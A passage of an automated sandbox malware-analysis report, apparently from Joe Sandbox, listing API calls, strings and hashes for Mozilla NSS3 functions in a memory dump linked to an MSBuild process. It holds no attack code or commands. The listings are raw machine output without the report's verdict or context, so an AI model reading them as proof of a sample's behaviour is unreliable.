                                                                                          • Part of subcall function 6C749DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DD1
                                                                                          • Part of subcall function 6C749DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C749DED
                                                                                        • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C6A4D98
                                                                                        • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C6A4DDA
                                                                                        • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C6A4E02
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID:
                                                                                        • API String ID: 4032354334-0
                                                                                        • Opcode ID: e838d87b6f3329398005b1c15fcd0f6e979b58fcb0ae2b2421e79ce1d3d73cd6
                                                                                        • Instruction ID: 9f8c39fc6e21279cf98770f83d5c0338f015570bdc1b0d85451fabe99003b4e8
                                                                                        • Opcode Fuzzy Hash: e838d87b6f3329398005b1c15fcd0f6e979b58fcb0ae2b2421e79ce1d3d73cd6
                                                                                        • Instruction Fuzzy Hash: 5841A4B5900601AFEB00AF68EC4596677A8AF0635DF144171EC08C7B12EF71ED15C7AA
                                                                                        APIs
                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C6E536F,00000022,?,?,00000000,?), ref: 6C6E4E70
                                                                                        • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C6E4F28
                                                                                        • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C6E4F8E
                                                                                        • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C6E4FAE
                                                                                        • free.MOZGLUE(?), ref: 6C6E4FC8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                        • String ID: %s=%c%s%c$%s=%s$oSnl"
                                                                                        • API String ID: 2709355791-1652504446
                                                                                        • Opcode ID: 6c88e3e632746098d102797c13408b1a088aa68b090a963023b8ce0505060deb
                                                                                        • Instruction ID: 47869354b4c7de44d1b56a180c1e97f8acd5f9601ebcd0b3ae6023ac622e7aa1
                                                                                        • Opcode Fuzzy Hash: 6c88e3e632746098d102797c13408b1a088aa68b090a963023b8ce0505060deb
                                                                                        • Instruction Fuzzy Hash: D6513B31E0F1458BEB01CAFA84907FF7BF59F8E348F188167E894A7A40D37599068799
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C6BACE6
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6BAD14
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6BAD23
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6BAD39
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: L_strncpyzPrint$L_strcatn
                                                                                        • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$nyl
                                                                                        • API String ID: 332880674-2485272832
                                                                                        • Opcode ID: 31583dfbd0235a20572bcf052ae0fb37ed4721866527067eb187fe26ae243d55
                                                                                        • Instruction ID: cd2d6bca48d29f1d0a6cc1685a3a6872810664872ed2d6def6ecdb81cd8088f4
                                                                                        • Opcode Fuzzy Hash: 31583dfbd0235a20572bcf052ae0fb37ed4721866527067eb187fe26ae243d55
                                                                                        • Instruction Fuzzy Hash: 55212F32600108DFD740DB54DD4DB5A37F5EB4A71DF044435E409A7612DF349919C79A
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_MessageEncryptFinal), ref: 6C6BA576
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6BA5A4
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6BA5B3
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6BA5C9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: L_strncpyzPrint$L_strcatn
                                                                                        • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptFinal$nyl
                                                                                        • API String ID: 332880674-3189223990
                                                                                        • Opcode ID: dd46b249de4c0dddac083efe8aae1560562371b31b8ca4c5401056662dcd55ba
                                                                                        • Instruction ID: 80cc8d892de61b94f60b3a9912c39ae4b3884f68d97f318df346f1d1c98791fb
                                                                                        • Opcode Fuzzy Hash: dd46b249de4c0dddac083efe8aae1560562371b31b8ca4c5401056662dcd55ba
                                                                                        • Instruction Fuzzy Hash: F9212C72601108DFD740DB54DE8CBAE37B5EB4A31DF044435E409ABA12DF349A59CB9A
                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C6CCD08
                                                                                        • PK11_DoesMechanism.NSS3(?,?), ref: 6C6CCE16
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6CD079
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                        • String ID:
                                                                                        • API String ID: 1351604052-0
                                                                                        • Opcode ID: ccbe20ccf4ed2edd58d4562bf4933927beca90d7baf4462b9e481be3f3ab577a
                                                                                        • Instruction ID: 7205f69dbffd84e8fbb6a54eec0a4e03adbf2d1b2cf48160b65ca73b48815e61
                                                                                        • Opcode Fuzzy Hash: ccbe20ccf4ed2edd58d4562bf4933927beca90d7baf4462b9e481be3f3ab577a
                                                                                        • Instruction Fuzzy Hash: 81C1AFB1A002199BDB10DF28CC84BDAB7B4FF49308F1441A8E84997741E775EE95CF9A
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C67670B
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C672B2C), ref: 6C67675E
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C67678E
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C672B2C), ref: 6C6767E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                        • String ID: @yl$Pyl$winClose$winUnmapfile1$winUnmapfile2
                                                                                        • API String ID: 3168844106-2562422158
                                                                                        • Opcode ID: 2ce61b15128022ab41a024a0e9be60637c48e639eb7a90369934bc3e4649afd9
                                                                                        • Instruction ID: 8097e7abb6780882eae9eea630cd33053333a5b5c7cf4b29627477cb3462e38c
                                                                                        • Opcode Fuzzy Hash: 2ce61b15128022ab41a024a0e9be60637c48e639eb7a90369934bc3e4649afd9
                                                                                        • Instruction Fuzzy Hash: F8A1B036B01210CFDF59AF64E989A6A3771BF0A319F14487CE906CB640DB34ED41CBA6
                                                                                        APIs
                                                                                        • PORT_ZAlloc_Util.NSS3(9DAE394A), ref: 6C682C5D
                                                                                          • Part of subcall function 6C6E0D30: calloc.MOZGLUE ref: 6C6E0D50
                                                                                          • Part of subcall function 6C6E0D30: TlsGetValue.KERNEL32 ref: 6C6E0D6D
                                                                                        • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C682C8D
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C682CE0
                                                                                          • Part of subcall function 6C682E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C682CDA,?,00000000), ref: 6C682E1E
                                                                                          • Part of subcall function 6C682E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C682E33
                                                                                          • Part of subcall function 6C682E00: TlsGetValue.KERNEL32 ref: 6C682E4E
                                                                                          • Part of subcall function 6C682E00: EnterCriticalSection.KERNEL32(?), ref: 6C682E5E
                                                                                          • Part of subcall function 6C682E00: PL_HashTableLookup.NSS3(?), ref: 6C682E71
                                                                                          • Part of subcall function 6C682E00: PL_HashTableRemove.NSS3(?), ref: 6C682E84
                                                                                          • Part of subcall function 6C682E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C682E96
                                                                                          • Part of subcall function 6C682E00: PR_Unlock.NSS3 ref: 6C682EA9
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C682D23
                                                                                        • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C682D30
                                                                                        • CERT_MakeCANickname.NSS3(00000001), ref: 6C682D3F
                                                                                        • free.MOZGLUE(00000000), ref: 6C682D73
                                                                                        • CERT_DestroyCertificate.NSS3(?), ref: 6C682DB8
                                                                                        • free.MOZGLUE ref: 6C682DC8
                                                                                          • Part of subcall function 6C683E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C683EC2
                                                                                          • Part of subcall function 6C683E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C683ED6
                                                                                          • Part of subcall function 6C683E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C683EEE
                                                                                          • Part of subcall function 6C683E60: PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0), ref: 6C683F02
                                                                                          • Part of subcall function 6C683E60: PL_FreeArenaPool.NSS3 ref: 6C683F14
                                                                                          • Part of subcall function 6C683E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C683F27
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                        • String ID:
                                                                                        • API String ID: 3941837925-0
                                                                                        • Opcode ID: b3a42378588d3d7ce929db1562aa663168b0baf1de71e66ab0a6b093d8d638fb
                                                                                        • Instruction ID: 9d191427ffec77d68878b72e74e206556b08efb866666db4b369efbd19389800
                                                                                        • Opcode Fuzzy Hash: b3a42378588d3d7ce929db1562aa663168b0baf1de71e66ab0a6b093d8d638fb
                                                                                        • Instruction Fuzzy Hash: F051E071A063119BEB00DE28CC88B6B7BE5EF84308F14083CEC5593750EB31E815CBAA
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C69E432
                                                                                        • EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C69E44F
                                                                                          • Part of subcall function 6C6A2C40: TlsGetValue.KERNEL32(#?jl,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C62
                                                                                          • Part of subcall function 6C6A2C40: EnterCriticalSection.KERNEL32(0000001C,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C76
                                                                                          • Part of subcall function 6C6A2C40: PL_HashTableLookup.NSS3(00000000,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C86
                                                                                          • Part of subcall function 6C6A2C40: PR_Unlock.NSS3(00000000,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C93
                                                                                        • TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C69E494
                                                                                        • EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C69E4AD
                                                                                        • PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C69E4D6
                                                                                        • PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C69E52F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                        • String ID: #?jl
                                                                                        • API String ID: 3106257965-1742918463
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(00000000,00000000,?,6C6A124D,00000001), ref: 6C698D19
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,6C6A124D,00000001), ref: 6C698D32
                                                                                        • PL_ArenaRelease.NSS3(?,?,?,?,?,6C6A124D,00000001), ref: 6C698D73
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C6A124D,00000001), ref: 6C698D8C
                                                                                          • Part of subcall function 6C72DD70: TlsGetValue.KERNEL32 ref: 6C72DD8C
                                                                                          • Part of subcall function 6C72DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C72DDB4
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,6C6A124D,00000001), ref: 6C698DBA
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                        • String ID: KRAM$KRAM
                                                                                        • API String ID: 2419422920-169145855
                                                                                        APIs
                                                                                        • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C754DC3
                                                                                        • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C754DE0
                                                                                        Strings
                                                                                        • %s at line %d of [%.10s], xrefs: 6C754DDA
                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C754DCB
                                                                                        • API call with %s database connection pointer, xrefs: 6C754DBD
                                                                                        • misuse, xrefs: 6C754DD5
                                                                                        • invalid, xrefs: 6C754DB8
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                        • API String ID: 632333372-2974027950
                                                                                        APIs
                                                                                        • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C754E30
                                                                                        • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C754E4D
                                                                                        Strings
                                                                                        • %s at line %d of [%.10s], xrefs: 6C754E47
                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C754E38
                                                                                        • API call with %s database connection pointer, xrefs: 6C754E2A
                                                                                        • misuse, xrefs: 6C754E42
                                                                                        • invalid, xrefs: 6C754E25
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                        • API String ID: 632333372-2974027950
                                                                                        APIs
                                                                                        • PR_SetError.NSS3(00000000,00000000,6C6C1444,?,00000001,?,00000000,00000000,?,?,6C6C1444,?,?,00000000,?,?), ref: 6C6C0CB3
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                        • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C6C1444,?,00000001,?,00000000,00000000,?,?,6C6C1444,?), ref: 6C6C0DC1
                                                                                        • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C6C1444,?,00000001,?,00000000,00000000,?,?,6C6C1444,?), ref: 6C6C0DEC
                                                                                          • Part of subcall function 6C6E0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C682AF5,?,?,?,?,?,6C680A1B,00000000), ref: 6C6E0F1A
                                                                                          • Part of subcall function 6C6E0F10: malloc.MOZGLUE(00000001), ref: 6C6E0F30
                                                                                          • Part of subcall function 6C6E0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C6E0F42
                                                                                        • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C6C1444,?,00000001,?,00000000,00000000,?), ref: 6C6C0DFF
                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C6C1444,?,00000001,?,00000000), ref: 6C6C0E16
                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C6C1444,?,00000001,?,00000000,00000000,?), ref: 6C6C0E53
                                                                                        • PR_GetCurrentThread.NSS3(?,?,?,?,6C6C1444,?,00000001,?,00000000,00000000,?,?,6C6C1444,?,?,00000000), ref: 6C6C0E65
                                                                                        • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C6C1444,?,00000001,?,00000000,00000000,?), ref: 6C6C0E79
                                                                                          • Part of subcall function 6C6D1560: TlsGetValue.KERNEL32(00000000,?,6C6A0844,?), ref: 6C6D157A
                                                                                          • Part of subcall function 6C6D1560: EnterCriticalSection.KERNEL32(?,?,?,6C6A0844,?), ref: 6C6D158F
                                                                                          • Part of subcall function 6C6D1560: PR_Unlock.NSS3(?,?,?,?,6C6A0844,?), ref: 6C6D15B2
                                                                                          • Part of subcall function 6C69B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C6A1397,00000000,?,6C69CF93,5B5F5EC0,00000000,?,6C6A1397,?), ref: 6C69B1CB
                                                                                          • Part of subcall function 6C69B1A0: free.MOZGLUE(5B5F5EC0,?,6C69CF93,5B5F5EC0,00000000,?,6C6A1397,?), ref: 6C69B1D2
                                                                                          • Part of subcall function 6C6989E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C6988AE,-00000008), ref: 6C698A04
                                                                                          • Part of subcall function 6C6989E0: EnterCriticalSection.KERNEL32(?), ref: 6C698A15
                                                                                          • Part of subcall function 6C6989E0: memset.VCRUNTIME140(6C6988AE,00000000,00000132), ref: 6C698A27
                                                                                          • Part of subcall function 6C6989E0: PR_Unlock.NSS3(?), ref: 6C698A35
                                                                                        Similarity
                                                                                        • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 1601681851-0
                                                                                        APIs
                                                                                        • sqlite3_value_text.NSS3(?,?), ref: 6C676ED8
                                                                                        • sqlite3_value_text.NSS3(?,?), ref: 6C676EE5
                                                                                        • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C676FA8
                                                                                        • sqlite3_value_text.NSS3(00000000,?), ref: 6C676FDB
                                                                                        • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C676FF0
                                                                                        • sqlite3_value_blob.NSS3(?,?), ref: 6C677010
                                                                                        • sqlite3_value_blob.NSS3(?,?), ref: 6C67701D
                                                                                        • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C677052
                                                                                        Similarity
                                                                                        • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                        • String ID:
                                                                                        • API String ID: 1920323672-0
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(6C6D2D7C,6C6A9192,?), ref: 6C6D248E
                                                                                        • EnterCriticalSection.KERNEL32(02B80138), ref: 6C6D24A2
                                                                                        • memset.VCRUNTIME140(6C6D2D7C,00000020,6C6D2D5C), ref: 6C6D250E
                                                                                        • memset.VCRUNTIME140(6C6D2D9C,00000020,6C6D2D7C), ref: 6C6D2535
                                                                                        • memset.VCRUNTIME140(?,00000020,?), ref: 6C6D255C
                                                                                        • memset.VCRUNTIME140(?,00000020,?), ref: 6C6D2583
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6D2594
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6D25AF
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                        Similarity
                                                                                        • API ID: memset$Value$CriticalEnterErrorSectionUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 2972906980-0
                                                                                        APIs
                                                                                        • PORT_Alloc_Util.NSS3(00000000), ref: 6C6D05DA
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • TlsGetValue.KERNEL32(00000000), ref: 6C6D060C
                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C6D0629
                                                                                        • TlsGetValue.KERNEL32(00000000), ref: 6C6D066F
                                                                                        • EnterCriticalSection.KERNEL32 ref: 6C6D068C
                                                                                        • PR_Unlock.NSS3 ref: 6C6D06AA
                                                                                        • PK11_GetNextSafe.NSS3 ref: 6C6D06C3
                                                                                        • PR_Unlock.NSS3 ref: 6C6D06F9
                                                                                        Similarity
                                                                                        • API ID: Value$CriticalEnterSectionUnlock$Alloc_K11_NextSafeUtilmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 1593870348-0
                                                                                        APIs
                                                                                        • SECITEM_CopyItem_Util.NSS3(00000000,00000000,6C687310,00000000,6C687310,?,?,00000004,?), ref: 6C688684
                                                                                          • Part of subcall function 6C6DFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C6D8D2D,?,00000000,?), ref: 6C6DFB85
                                                                                          • Part of subcall function 6C6DFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C6DFBB1
                                                                                        • SECITEM_CopyItem_Util.NSS3(00000000,-0000000C,6C687304,?,?,?,00000000,6C687310,?,?,00000004,?), ref: 6C68869F
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,?,?,?,?,?,00000000,6C687310,?,?,00000004,?), ref: 6C6886D7
